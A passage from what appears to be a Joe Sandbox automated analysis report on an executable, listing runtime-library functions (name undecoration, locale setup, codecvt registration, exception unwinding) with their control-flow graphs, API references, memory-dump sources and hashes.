                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC08C34400F0087CE39891082B27E43356A391782F8818CCC8030B782C62FDCC3DA50
                                                                                                                                                                                                                      Function 00639362 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                      • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                      Function 0063937A Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                      • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                                      Function 0065A430 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 181 65a430-65a441 182 65a443-65a457 call 65755a 181->182 183 65a458-65a45b 181->183 184 65a462-65a465 183->184 185 65a45d-65a460 183->185 187 65a47a-65a48a 184->187 188 65a467-65a479 184->188 185->184 185->187 190 65a4c0-65a4c2 187->190 191 65a48c-65a490 187->191 194 65a4c4 190->194 195 65a4c9 190->195 192 65a492-65a4a1 191->192 193 65a4a8-65a4bb call 65755a 191->193 192->195 196 65a4a3-65a4a6 192->196 203 65a80c-65a80e 193->203 198 65a4c7 194->198 199 65a4cc-65a4cf 195->199 196->198 198->195 198->199 201 65a4e7-65a507 199->201 202 65a4d1-65a4e2 199->202 204 65a5e5-65a5e8 201->204 205 65a50d-65a53d call 656e96 call 6572de 201->205 202->203 207 65a5ee-65a5fd 204->207 208 65a698-65a6a3 204->208 225 65a582-65a5a1 call 656aa4 call 6572de 205->225 226 65a53f-65a580 call 65a179 call 656e69 call 6572de call 6570bf 205->226 212 65a603-65a643 call 6591b5 call 656e69 call 6572de call 6570bf 207->212 213 65a689-65a693 call 6591b5 call 656687 207->213 210 65a6a5-65a6c9 call 6571cb call 6572de 208->210 211 65a6cb-65a6d9 call 6571cb call 656687 208->211 234 65a6de-65a6e2 210->234 211->234 212->208 213->208 251 65a5a4-65a5b0 225->251 226->251 238 65a6e4-65a71c call 656e69 call 6572de call 657326 234->238 239 65a71f-65a72e call 6564ef 234->239 238->239 253 65a740 239->253 254 65a730-65a73e 239->254 257 65a5b6-65a5b8 251->257 258 65a66c-65a684 call 656aa4 call 6572de 251->258 259 65a742-65a79a call 656d60 call 65781c call 656e69 call 6572de call 657326 call 6570bf 253->259 254->259 262 65a656-65a667 257->262 263 65a5be-65a5d2 257->263 282 65a807 258->282 293 65a7ac-65a7bc 259->293 294 65a79c-65a79e 259->294 270 65a80a-65a80b 262->270 268 65a645-65a654 call 6569c9 call 656687 263->268 269 65a5d4-65a5e2 call 6569c9 263->269 268->204 269->204 270->203 282->270 296 65a7cf-65a7d9 call 6578fc call 656687 293->296 297 65a7be-65a7cd call 6578fc call 6570bf 293->297 294->293 295 65a7a0-65a7a7 call 6570bf 294->295 295->293 306 65a7de-65a7e0 296->306 297->306 307 65a7e2-65a7fb 306->307 308 65a7fd-65a802 call 656aa4 306->308 307->270 308->282
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • operator+.LIBCMT ref: 0065A44B
                                                                                                                                                                                                                        • Part of subcall function 0065755A: DName::DName.LIBCMT ref: 0065756D
                                                                                                                                                                                                                        • Part of subcall function 0065755A: DName::operator+.LIBCMT ref: 00657574
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NameName::Name::operator+operator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2937105810-0
                                                                                                                                                                                                                      • Opcode ID: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
                                                                                                                                                                                                                      • Instruction ID: 6dbd678b02a886a50db1ae96ee80a23a41a36dbc1549d9f671fe224147237345
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50D13175D00209AFCB50DFE8D895AEDBBF6EF08302F14416AF905E7291EB309A49CB55
                                                                                                                                                                                                                      Function 0065B178 Relevance: 27.3, APIs: 18, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 310 65b178-65b18c 311 65b192-65b1b3 310->311 312 65b4fe-65b50b call 65755a 310->312 313 65b1b5 311->313 314 65b207-65b20a 311->314 322 65b50e 312->322 316 65b3e8-65b3f0 call 657378 313->316 317 65b1bb-65b1c1 313->317 318 65b210 314->318 319 65b3db-65b3e3 call 657196 314->319 328 65b3f5-65b3f8 316->328 324 65b1c7 317->324 325 65b3d3-65b3d6 317->325 318->325 326 65b216-65b219 318->326 319->316 327 65b511-65b515 322->327 324->314 331 65b310-65b32a call 65905b 325->331 329 65b3cc-65b3d1 326->329 330 65b21f-65b222 326->330 332 65b355-65b36d 328->332 333 65b3fe-65b403 328->333 329->328 335 65b3bd 330->335 336 65b228-65b22b 330->336 331->333 351 65b330-65b338 331->351 337 65b4a7-65b4aa 332->337 338 65b373-65b397 call 65aeed 332->338 339 65b445-65b44d 333->339 340 65b405-65b40a 333->340 341 65b3c2-65b3ca call 657196 335->341 336->325 343 65b231-65b247 336->343 344 65b4e4-65b4fc call 65aeed 337->344 345 65b4ac-65b4af 337->345 367 65b3a6-65b3b1 338->367 368 65b399-65b3a1 call 657378 338->368 346 65b452-65b46a call 656e96 call 6572de 339->346 348 65b436-65b443 340->348 349 65b40c-65b40e 340->349 341->333 352 65b2ed-65b2f0 343->352 353 65b24d-65b250 343->353 344->322 354 65b4b1-65b4c1 call 657196 345->354 355 65b4d2-65b4d5 345->355 394 65b46d-65b473 346->394 348->346 349->348 360 65b410-65b412 349->360 351->327 358 65b3b6-65b3bb 352->358 359 65b2f6-65b2f9 352->359 363 65b256-65b259 353->363 364 65b2e3-65b2e8 353->364 354->344 390 65b4c3-65b4d0 call 657378 354->390 355->344 371 65b4d7-65b4df call 657196 355->371 358->341 369 65b352-65b354 359->369 370 65b2fb-65b2fe 359->370 360->348 372 65b414-65b416 360->372 374 65b2c0-65b2c3 363->374 375 65b25b-65b25e 363->375 364->341 383 65b4a2-65b4a5 367->383 368->367 369->332 381 65b300-65b303 370->381 382 65b34b-65b350 370->382 371->344 372->348 385 65b418-65b41b 372->385 386 65b2c5-65b2c8 374->386 387 65b33d-65b342 374->387 376 65b2b6-65b2bb 375->376 377 65b260-65b262 375->377 376->341 388 65b264-65b267 377->388 389 65b2a1-65b2b1 call 656bdd 377->389 392 65b305-65b30b 381->392 393 65b344-65b349 381->393 382->341 383->327 385->394 395 65b41d-65b424 385->395 396 65b2d9-65b2de 386->396 397 65b2ca-65b2cd 386->397 387->341 399 65b27f-65b29c call 65b178 call 65757e 388->399 400 65b269-65b26f 388->400 389->333 390->344 392->387 404 65b30d 392->404 393->341 402 65b475-65b492 call 656e69 call 6572de call 6570bf 394->402 403 65b497-65b49f 394->403 395->348 406 65b426-65b428 395->406 396->341 397->387 398 65b2cf-65b2d4 397->398 398->341 399->322 400->387 407 65b275-65b27a 400->407 402->403 403->383 404->331 406->348 412 65b42a-65b42c 406->412 407->341 412->348 415 65b42e-65b430 412->415 415->348 418 65b432-65b434 415->418 418->348 418->394
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1129569759-0
                                                                                                                                                                                                                      • Opcode ID: 41398f7896199ac113d6eeb15d100a19ca7baa02221be04e36fa611c5984d02d
                                                                                                                                                                                                                      • Instruction ID: e25b25e59f9ce3d8c337dbbebbd30f0e8007e784ef5aad5950915c006dd12949
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41398f7896199ac113d6eeb15d100a19ca7baa02221be04e36fa611c5984d02d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4891E471D0420AAFCB24DE98D886AFD77B6AF04313F64616AFC11E7292D7349A4DCB14
                                                                                                                                                                                                                      Function 006609EC Relevance: 24.1, APIs: 16, Instructions: 95COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 422 6609ec-6609f7 423 660a1d 422->423 424 6609f9-6609fd 422->424 425 660a1f-660a22 423->425 424->423 426 6609ff-660a10 call 65bf4c 424->426 429 660a12-660a17 call 65b9cc 426->429 430 660a23-660a34 call 65bf4c 426->430 429->423 435 660a36-660a37 call 655813 430->435 436 660a3f-660a51 call 65bf4c 430->436 439 660a3c-660a3d 435->439 441 660a63-660a7f call 65fd14 call 6607d0 436->441 442 660a53-660a61 call 655813 * 2 436->442 439->429 451 660a81-660a98 call 65e3c0 call 65e459 call 655813 441->451 452 660a9a-660aab call 65e9ad 441->452 442->439 468 660acc-660ace 451->468 457 660ad0-660ad8 452->457 458 660aad-660ac9 call 655813 call 65e3c0 call 65e459 call 655813 452->458 462 660ada-660adc 457->462 458->468 462->425 468->462
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2193103758-0
                                                                                                                                                                                                                      • Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                                                                                                                                      • Instruction ID: 26b2bc738a3275dc005940278f190eb6e92b0d8a6d3bb378ff1a9998f68fe569
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95212331104711AAE7657FA4D802A4B7BE3DF81791F20843EFC9556293DF329D05CB98
                                                                                                                                                                                                                      Function 006153A7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 006153AE
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006153B8
                                                                                                                                                                                                                      • int.LIBCPMT ref: 006153CF
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 006153F2
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00615409
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00615429
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00615436
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2133458128-1810561636
                                                                                                                                                                                                                      • Opcode ID: e14aaeb9c33c7f373905e459f7465f787291077ca2190e5816e3bbb181c7ceec
                                                                                                                                                                                                                      • Instruction ID: bcc8d504a2bf30c8d24eecd9a88c518ff9e969a7e39a2117369ded2ce1e171ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e14aaeb9c33c7f373905e459f7465f787291077ca2190e5816e3bbb181c7ceec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E11A271910A25DBCB50EF64D8466EDB7F7EF84320F58040DE402AB391DF719A818B95
                                                                                                                                                                                                                      Function 00613C7E Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00613C85
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00613C8F
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00613CA6
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00613CC9
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00613CE0
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00613D00
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00613D0D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2133458128-1810561636
                                                                                                                                                                                                                      • Opcode ID: 765a1162f65bd4565b9c80512c2ff2e40bcd863909c55a726d1b15a78a8a71d3
                                                                                                                                                                                                                      • Instruction ID: 9329d72a433e8cf42a1748dde22d99e523c879bc6337ac38aa6afdd40d99943f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 765a1162f65bd4565b9c80512c2ff2e40bcd863909c55a726d1b15a78a8a71d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB019E729041259BDB45EF64D81A6ED7BB7AF84710F2C000DF812AB391DF319F828B95
                                                                                                                                                                                                                      Function 0061A448 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 530 61a448-61a473 call 61b3c0 533 61a7e7-61a7ec call 61e01c 530->533 534 61a479-61a47c 530->534 534->533 535 61a482-61a48b 534->535 537 61a491-61a495 535->537 538 61a588-61a58e 535->538 537->538 540 61a49b-61a4a2 537->540 541 61a596-61a5a4 538->541 542 61a4a4-61a4ab 540->542 543 61a4ba-61a4bf 540->543 544 61a750-61a753 541->544 545 61a5aa-61a5ae 541->545 542->543 546 61a4ad-61a4b4 542->546 543->538 547 61a4c5-61a4cd call 61a0cc 543->547 548 61a755-61a758 544->548 549 61a776-61a77f call 61a0cc 544->549 545->544 550 61a5b4-61a5bb 545->550 546->538 546->543 564 61a781-61a785 547->564 565 61a4d3-61a4ec call 61a0cc * 2 547->565 548->533 552 61a75e-61a773 call 61a7ed 548->552 549->533 549->564 553 61a5d3-61a5d9 550->553 554 61a5bd-61a5c4 550->554 552->549 559 61a6f0-61a6f4 553->559 560 61a5df-61a606 call 6182fd 553->560 554->553 558 61a5c6-61a5cd 554->558 558->544 558->553 562 61a700-61a70c 559->562 563 61a6f6-61a6ff call 61813f 559->563 560->559 572 61a60c-61a60f 560->572 562->549 570 61a70e-61a718 562->570 563->562 565->533 589 61a4f2-61a4f8 565->589 574 61a726-61a728 570->574 575 61a71a-61a71c 570->575 577 61a612-61a627 572->577 579 61a72a-61a73d call 61a0cc * 2 574->579 580 61a73f-61a74c call 61ae66 574->580 575->549 578 61a71e-61a722 575->578 582 61a6d1-61a6e4 577->582 583 61a62d-61a630 577->583 578->549 585 61a724 578->585 604 61a786 call 620c3d 579->604 597 61a7ab-61a7c0 call 61a0cc * 2 580->597 598 61a74e 580->598 582->577 590 61a6ea-61a6ed 582->590 583->582 591 61a636-61a63e 583->591 585->579 594 61a524-61a52c call 61a0cc 589->594 595 61a4fa-61a4fe 589->595 590->559 591->582 596 61a644-61a658 591->596 614 61a590-61a593 594->614 615 61a52e-61a54e call 61a0cc * 2 call 61ae66 594->615 595->594 600 61a500-61a507 595->600 601 61a65b-61a66c 596->601 627 61a7c2 597->627 628 61a7c5-61a7e2 call 6184e9 call 61ad66 call 61af23 call 61acdd 597->628 598->549 605 61a509-61a510 600->605 606 61a51b-61a51e 600->606 607 61a692-61a69f 601->607 608 61a66e-61a67f call 61a923 601->608 618 61a78b-61a7a6 call 61813f call 61aad7 call 6180d3 604->618 605->606 612 61a512-61a519 605->612 606->533 606->594 607->601 617 61a6a1 607->617 624 61a681-61a68a 608->624 625 61a6a3-61a6cb call 61a3c8 608->625 612->594 612->606 614->541 615->614 644 61a550-61a555 615->644 622 61a6ce 617->622 618->597 622->582 624->608 630 61a68c-61a68f 624->630 625->622 627->628 628->533 630->607 644->604 646 61a55b-61a56e call 61aaef 644->646 646->618 651 61a574-61a580 646->651 651->604 652 61a586 651->652 652->646
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0061A567
                                                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0061A675
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0061A7C7
                                                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0061A7E2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                      • API String ID: 2751267872-393685449
                                                                                                                                                                                                                      • Opcode ID: 5cc5af9d837c47a238ce316e2ad5ed6c75675787d498417c24dbc14dd81afc81
                                                                                                                                                                                                                      • Instruction ID: 41aba0480bbdc6aa0c92c3eae2cc2334898af1f28b145bad7a2944b1da6e31d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cc5af9d837c47a238ce316e2ad5ed6c75675787d498417c24dbc14dd81afc81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6B17A75802209EFCF15DFE4C8819EEBBB6FF08310F18455AE8146B256D731DA91CBA6
                                                                                                                                                                                                                      Function 00624633 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
